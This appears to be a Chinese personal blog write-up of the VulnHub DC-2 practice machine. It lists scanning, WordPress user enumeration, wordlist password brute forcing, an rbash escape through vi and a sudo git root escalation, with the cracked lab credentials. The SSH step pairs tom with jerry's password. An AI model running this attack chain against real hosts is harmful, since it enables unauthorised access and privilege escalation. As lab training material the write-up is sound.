DC-2vulnhub渗透测试

前言

DC:2-vulnhub渗透测试

靶机IP:192.168.1.170

kaLiIP:192.168.1.124

渗透过程

nmap扫描端口

1
nmap -sS -Pn -A -p 1-65535 192.168.1.170

image-20200228152255605

这里有一个80端口的站点是wordpress

访问80端口看一下,这里看到flag1

image-20200228152836680

这里说我们要用cewl获取一个字典文件。

我们扫描一个这个站点,使用wpscan

1
wpscan --url http://dc-2 -e u

image-20200228153212655

然后我们就接着生成字典,再去爆破一个这几个用户名

1
2
cewl http://dc-2/ -w pass
wpscan --url http://dc-2 -U admin/jerry/tom -P pass

image-20200228153635619

image-20200228153739430

1
2
jerry / adipiscing   
tom / parturient

然后用这两个账号登陆,tom这个账号没有可用的东西,然后在jerry这个账号中发现了flag2

image-20200228153902313

说明wordpress没有可用的东西了

思路转向ssh

1
2
ssh tom@192.168.1.170 -p 7744
adipiscing

查看一下,发现能用的命令很少,tom 这是一个rbash

image-20200228154252622

但是在tom中发现了flag3

image-20200228154353684

提示说使用su,但是rbash让我们很无力,所以使用vi来补全功能,获得新shell

1
2
3
vi 1.txt
:set shell=/bin/sh
:shell

通过export查看环境变量。

image-20200228154909465

image-20200228154957211

image-20200228154957211

转到jerry用户,然后查看flag4.txt

说是git提权

1
2
sudo git -p help config
!/bin/sh

image-20200228155525660

总结

vi修改shell要学习一下

Author: 我是小吴啦
Link: http://yoursite.com/2020/03/04/DC-2vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.